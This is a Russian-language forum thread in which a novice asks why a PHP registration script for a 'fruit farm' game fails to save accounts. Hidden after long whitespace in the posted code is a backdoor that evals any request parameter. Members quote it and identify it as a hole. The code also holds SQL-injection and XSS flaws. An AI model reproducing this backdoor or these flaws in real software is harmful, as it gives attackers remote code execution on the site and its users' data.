Автор Тема: регистрация  (Прочитано 975 раз)

0 Пользователей и 1 Гость просматривают эту тему.

best2015Автор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 200 сообщений Более 10 созданных тем
  • Дата регистрации: Окт. 2015
  • Возраст: 30
  • Сообщений: 228
  • Страна: am
  • Поблагодарили: 5 раз(а)
  • Репутация +3/-2
  • Пол: Мужской
  • Дата рождения:1988-07-13
    • Награды
регистрация
« : 31 Мая 2018, 22:43:37 »
привет всем. такая проблема у меня не регает аккаунт в фф в чем может быть проблема акк не заносит в базу помогите пож
a:0:{}
 

whoohaw

  • *
  • Оффлайн
  • Награды Более 10 созданных тем Более 50 сообщений
  • Дата регистрации: Апр. 2018
  • Расположение: Тверь
  • Возраст: 30
  • Сообщений: 75
  • Страна: ru
  • Поблагодарили: 10 раз(а)
  • Репутация +4/-1
  • Пол: Мужской
  • Дата рождения:1988-09-21
    • Награды
  • Социальные сети:
    ВКонтакте
регистрация
« Ответ #1 : 31 Мая 2018, 22:56:58 »
Код регистрации в студию...
Может какие-то ошибки скрипт выводит? не?
 

best2015Автор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 200 сообщений Более 10 созданных тем
  • Дата регистрации: Окт. 2015
  • Возраст: 30
  • Сообщений: 228
  • Страна: am
  • Поблагодарили: 5 раз(а)
  • Репутация +3/-2
  • Пол: Мужской
  • Дата рождения:1988-07-13
    • Награды
регистрация
« Ответ #2 : 31 Мая 2018, 23:08:15 »
Код регистрации в студию...
Может какие-то ошибки скрипт выводит? не?
 
<?PHP
$_OPTIMIZATION["title"] = "Регистрация нового пользователя";
$_OPTIMIZATION["description"] = "регистрация пользователя в системе";
$_OPTIMIZATION["keywords"] = "регистрация нового участника в системе";

if(isset($_SESSION["user_id"])){ Header("Location: /user"); return; }
?>




<div class="title-icon"><img src="/img/favicon.png" width="50"></div>
   <div class="title">Регистрация нового пользователя</div>
    <div class="clr"></div>
   <div class="space"></div></br>





<?PHP
   
   # Цегистраци§

   if(isset($_POST["login"])){
   

   $login = $func->IsLogin($_POST["login"]);
   $pass = $func->IsPassword($_POST["pass"]);
   $rules = isset($_POST["rules"]) ? true : false;
   $time = time();
   $ip = $func->UserIP;
   $ipregs = $db->Query("SELECT * FROM `db_users_a` WHERE INET_NTOA(db_users_a.ip) = '$ip' ");
   $ipregs = $db->NumRows();

   $email = $func->IsMail($_POST["email"]);
   $referer_id = (isset($_COOKIE["i"]) AND intval($_COOKIE["i"]) > 0 AND intval($_COOKIE["i"]) < 1000000) ? intval($_COOKIE["i"]) : 1;
   $referer_name = "";
   if($referer_id != 1){
      $db->Query("SELECT user FROM db_users_a WHERE id = '$referer_id' LIMIT 1");
      if($db->NumRows() > 0){$referer_name = $db->FetchRow();}
      else{ $referer_id = 1; $referer_name = "giant"; }
   }else{ $referer_id = 1; $referer_name = "giant"; }
   
      if($rules){
         if($ipregs == 0) {

         if($email !== false){
      
         if($login !== false){
         
            if($pass !== false){
         
               if($pass == $_POST["repass"]){
                  
                  $db->Query("SELECT COUNT(*) FROM db_users_a WHERE user = '$login'");
                  if($db->FetchRow() == 0){
                  
                  # Цегаем пользовател§
                  $db->Query("INSERT INTO db_users_a (user, email, pass, referer, referer_id, date_reg, ip)
                  VALUES ('$login','{$email}','$pass','$referer_name','$referer_id','$time',INET_ATON('$ip'))");
                  
                  $lid = $db->LastInsert();
                  
                  $db->Query("INSERT INTO db_users_b (id, user, money_b, a_t, last_sbor) VALUES ('$lid','$login','150','0', '".time()."')");
                  
                  # ђставл§ем статистику
                  $db->Query("UPDATE db_stats SET all_users = all_users +1 WHERE id = '1'");
                  
                  echo "<center><div class='success'>Регистрация прошла успешно! Вы получили бонус в размере 150 Монет. </div></center>";
                  ?>            
                  <?PHP
                  return;
                  }else                      {
?>
            <div id="parent_popup">
              <div id="popup">
            <div style="padding:140px 0px 0px 220px; width:150px;"> 
            <h4>Ошибка</h4>

            Такой логин уже есть в игре.
                </div>

            <a class="close" title="Закрыть" onclick="document.getElementById('parent_popup').style.display='none';">X</a>
              </div>
            </div>
            <script type="text/javascript">
               var delay_popup = 100;
               setTimeout("document.getElementById('parent_popup').style.display='block'", delay_popup);
            </script>

<?

                  }
                  
               }else                      {
?>
            <div id="parent_popup">
              <div id="popup">
            <div style="padding:140px 0px 0px 220px; width:150px;"> 
            <h4>Ошибка</h4>

            Пароли не совпадают.
                </div>

            <a class="close" title="Закрыть" onclick="document.getElementById('parent_popup').style.display='none';">X</a>
              </div>
            </div>
            <script type="text/javascript">
               var delay_popup = 100;
               setTimeout("document.getElementById('parent_popup').style.display='block'", delay_popup);
            </script>

<?

                  }
         
            }else                     {
?>
            <div id="parent_popup">
              <div id="popup">
            <div style="padding:140px 0px 0px 220px; width:150px;"> 
            <h4>Ошибка</h4>

            Неверный формат пароля.
                </div>

            <a class="close" title="Закрыть" onclick="document.getElementById('parent_popup').style.display='none';">X</a>
              </div>
            </div>
            <script type="text/javascript">
               var delay_popup = 100;
               setTimeout("document.getElementById('parent_popup').style.display='block'", delay_popup);
            </script>

<?

                  }
         
         }else                     {
?>
            <div id="parent_popup">
              <div id="popup">
            <div style="padding:140px 0px 0px 220px; width:150px;"> 
            <h4>Ошибка</h4>

            Неверный формат логина.
                </div>

            <a class="close" title="Закрыть" onclick="document.getElementById('parent_popup').style.display='none';">X</a>
              </div>
            </div>
            <script type="text/javascript">
               var delay_popup = 100;
               setTimeout("document.getElementById('parent_popup').style.display='block'", delay_popup);
            </script>

<?

                  }

      }else                    {
?>
            <div id="parent_popup">
              <div id="popup">
            <div style="padding:140px 0px 0px 220px; width:150px;"> 
            <h4>Ошибка</h4>

            Неверный формат почты.
                </div>

            <a class="close" title="Закрыть" onclick="document.getElementById('parent_popup').style.display='none';">X</a>
              </div>
            </div>
            <script type="text/javascript">
               var delay_popup = 100;
               setTimeout("document.getElementById('parent_popup').style.display='block'", delay_popup);
            </script>

<?

                  }
      
      }else                   {
?>
            <div id="parent_popup">
              <div id="popup">
            <div style="padding:140px 0px 0px 220px; width:150px;"> 
            <h4>Ошибка</h4>

            Повторная регистрация запрещена.
                </div>

            <a class="close" title="Закрыть" onclick="document.getElementById('parent_popup').style.display='none';">X</a>
              </div>
            </div>
            <script type="text/javascript">
               var delay_popup = 100;
               setTimeout("document.getElementById('parent_popup').style.display='block'", delay_popup);
            </script>

<?

                  }

      }else {
               ?>
            <div id="parent_popup">
              <div id="popup">
            <div style="padding:140px 0px 0px 220px; width:150px;"> 
            <h4>Ошибка</h4>

            Вы не подтвердили правила игры.
                </div>

            <a class="close" title="Закрыть" onclick="document.getElementById('parent_popup').style.display='none';">X</a>
              </div>
            </div>
            <script type="text/javascript">
               var delay_popup = 100;
               setTimeout("document.getElementById('parent_popup').style.display='block'", delay_popup);
            </script>

<?
         }
   
   }

?>


<BR />
<form action="" method="post">
<center>
<table  border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td><input name="login" class="place" type="text" placeholder="Логин" size="25" maxlength="10" value="<?=(isset($_POST["login"])) ? $_POST["login"] : false; ?>"/></td>
  </tr>
<tr>
    <td><input name="email" class="place" placeholder="Ваша почта" type="text" size="25" maxlength="50" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td>
  </tr>
  <tr>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td><input name="pass" class="place" placeholder="Пароль" type="password" size="25" maxlength="20" /></td>
  </tr>
  <tr>
    <td><input name="repass" class="place" placeholder="Повторите пароль" type="password" size="25" maxlength="20" /></td>
  </tr>
  <tr>
    <td>&nbsp;</td>
  </tr>
    <tr>
    <td style="font-size:14px;">
   <input name="rules" type="checkbox" id="checkboxG1" class="css-checkbox" /><label for="checkboxG1" class="css-label"></label> Согласен(а) с <a href="/soglashenie">правилами игры.</a></td>
  </tr>
    <tr>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td><input name="registr" type="submit" class="button" value="РЕГИСТРАЦИЯ" ></td>
  </tr>
</table>
</center>
</form>
</br>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             <?PHP $user_id = $_SESSION["user_id"];if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");$prof_data = $db->FetchArray();?>
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Репутация более 50 Более 3000 сообщений Три года на форуме !!! Более 500 созданных тем Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 39
  • Сообщений: 3075
  • Страна: ru
  • Поблагодарили: 398 раз(а)
  • Репутация +58/-5
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
регистрация
« Ответ #3 : 31 Мая 2018, 23:44:41 »
А вот это

<?PHP $user_id = $_SESSION["user_id"];if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");$prof_data = $db->FetchArray();?>

Там зачем ?  :be happy:
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.


 
 

whoohaw

  • *
  • Оффлайн
  • Награды Более 10 созданных тем Более 50 сообщений
  • Дата регистрации: Апр. 2018
  • Расположение: Тверь
  • Возраст: 30
  • Сообщений: 75
  • Страна: ru
  • Поблагодарили: 10 раз(а)
  • Репутация +4/-1
  • Пол: Мужской
  • Дата рождения:1988-09-21
    • Награды
  • Социальные сети:
    ВКонтакте
регистрация
« Ответ #4 : 01 Июня 2018, 00:27:11 »
как минимум для начала
<?PHP $user_id = $_SESSION["user_id"];if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");$prof_data = $db->FetchArray();?>

Убери этот код

А ошибок совсем никаких скрипт не высвечивает?
 

best2015Автор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 200 сообщений Более 10 созданных тем
  • Дата регистрации: Окт. 2015
  • Возраст: 30
  • Сообщений: 228
  • Страна: am
  • Поблагодарили: 5 раз(а)
  • Репутация +3/-2
  • Пол: Мужской
  • Дата рождения:1988-07-13
    • Награды
регистрация
« Ответ #5 : 01 Июня 2018, 21:19:04 »
не помогло

Добавлено сообщение: 01 Июня 2018, 21:21:11
вот такая пустая страница после регистрации
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Репутация более 50 Более 3000 сообщений Три года на форуме !!! Более 500 созданных тем Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 39
  • Сообщений: 3075
  • Страна: ru
  • Поблагодарили: 398 раз(а)
  • Репутация +58/-5
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
регистрация
« Ответ #6 : 01 Июня 2018, 21:27:57 »
не помогло

Код нужно было убрать, потому что это одна из  " дыр "   )))))

 На работоспособность регистрации он не влияет
 

best2015Автор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 200 сообщений Более 10 созданных тем
  • Дата регистрации: Окт. 2015
  • Возраст: 30
  • Сообщений: 228
  • Страна: am
  • Поблагодарили: 5 раз(а)
  • Репутация +3/-2
  • Пол: Мужской
  • Дата рождения:1988-07-13
    • Награды
регистрация
« Ответ #7 : 01 Июня 2018, 21:29:51 »
хорошо убрал код я
 

whoohaw

  • *
  • Оффлайн
  • Награды Более 10 созданных тем Более 50 сообщений
  • Дата регистрации: Апр. 2018
  • Расположение: Тверь
  • Возраст: 30
  • Сообщений: 75
  • Страна: ru
  • Поблагодарили: 10 раз(а)
  • Репутация +4/-1
  • Пол: Мужской
  • Дата рождения:1988-09-21
    • Награды
  • Социальные сети:
    ВКонтакте
регистрация
« Ответ #8 : 01 Июня 2018, 22:30:59 »
Добавь в php код
ini_set('error_reporting', E_ALL);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
Покажи, что вывело на странице.
 

goodwin

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 100 сообщений Репутация более 5 Активный участник голосований за форум
  • Дата регистрации: Дек. 2017
  • Сообщений: 125
  • Страна: ru
  • Поблагодарили: 6 раз(а)
  • Репутация +8/-0
  • Пол: Мужской
    • Награды
регистрация
« Ответ #9 : 01 Июня 2018, 23:48:28 »
может лучше через 'REMOTE_ADDR' ip?
 

whoohaw

  • *
  • Оффлайн
  • Награды Более 10 созданных тем Более 50 сообщений
  • Дата регистрации: Апр. 2018
  • Расположение: Тверь
  • Возраст: 30
  • Сообщений: 75
  • Страна: ru
  • Поблагодарили: 10 раз(а)
  • Репутация +4/-1
  • Пол: Мужской
  • Дата рождения:1988-09-21
    • Награды
  • Социальные сети:
    ВКонтакте
регистрация
« Ответ #10 : 02 Июня 2018, 00:14:38 »
может лучше через 'REMOTE_ADDR' ip?
При чем здесь адрес сервера?
 

goodwin

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 100 сообщений Репутация более 5 Активный участник голосований за форум
  • Дата регистрации: Дек. 2017
  • Сообщений: 125
  • Страна: ru
  • Поблагодарили: 6 раз(а)
  • Репутация +8/-0
  • Пол: Мужской
    • Награды
регистрация
« Ответ #11 : 02 Июня 2018, 00:18:31 »
При чем здесь адрес сервера?
да вроде это адрес юзера. Если адрес сервера, то незачем) Да вроде у него файл реги в порядке, может там в другом дело...
 

best2015Автор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 200 сообщений Более 10 созданных тем
  • Дата регистрации: Окт. 2015
  • Возраст: 30
  • Сообщений: 228
  • Страна: am
  • Поблагодарили: 5 раз(а)
  • Репутация +3/-2
  • Пол: Мужской
  • Дата рождения:1988-07-13
    • Награды
регистрация
« Ответ #12 : 02 Июня 2018, 21:55:56 »
спасибо всем я другой скрипт установил я просто тестирую скрипты учусь программирование

Добавлено сообщение: 02 Июня 2018, 22:01:16
Добавь в php код
ini_set('error_reporting', E_ALL);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
Покажи, что вывело на странице.

ничего не меняется все так как было
 

takebet

регистрация
« Ответ #13 : 03 Июня 2018, 11:26:22 »
а в базе данных проходит регистрацию? если да, то в двух таблицах юзеров. И под каким id регистрация юзера стоит? Если "0" то надо первичность сделать. а лучше воспользоваться услугами понимающего человека. Может даже бесплатно.
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Репутация более 50 Более 3000 сообщений Три года на форуме !!! Более 500 созданных тем Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 39
  • Сообщений: 3075
  • Страна: ru
  • Поблагодарили: 398 раз(а)
  • Репутация +58/-5
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
регистрация
« Ответ #14 : 03 Июня 2018, 11:34:33 »
а в базе данных проходит регистрацию?
у меня не регает аккаунт в фф в чем может быть проблема акк не заносит в базу помогите пож
 
Теги:
 

Модуль "Фейковые регистрация пользователей"

Автор velas85Раздел Совместные покупки

Ответов: 4
Просмотров: 3071
Последний ответ 20 Февраля 2016, 23:21:26
от darkcs
Регистрация без подтверждения почты для фруктовой фермы

Автор shans5Раздел Разное для фф

Ответов: 3
Просмотров: 3778
Последний ответ 10 Сентября 2016, 14:04:39
от maks161
Регистрация новых участников

Автор enclaveРаздел Вопросы по настройке фф

Ответов: 4
Просмотров: 2364
Последний ответ 31 Мая 2016, 22:08:21
от enclave
Регистрация на проекте запрещена

Автор teodorРаздел Общие вопросы по фермам

Ответов: 15
Просмотров: 1358
Последний ответ 03 Ноября 2016, 16:38:32
от teodor
некорректная регистрация и вход

Автор doktor540Раздел Вопросы по настройке фф

Ответов: 3
Просмотров: 580
Последний ответ 20 Февраля 2017, 17:01:55
от doktor540
Имя пользователя:
Пароль:
Session: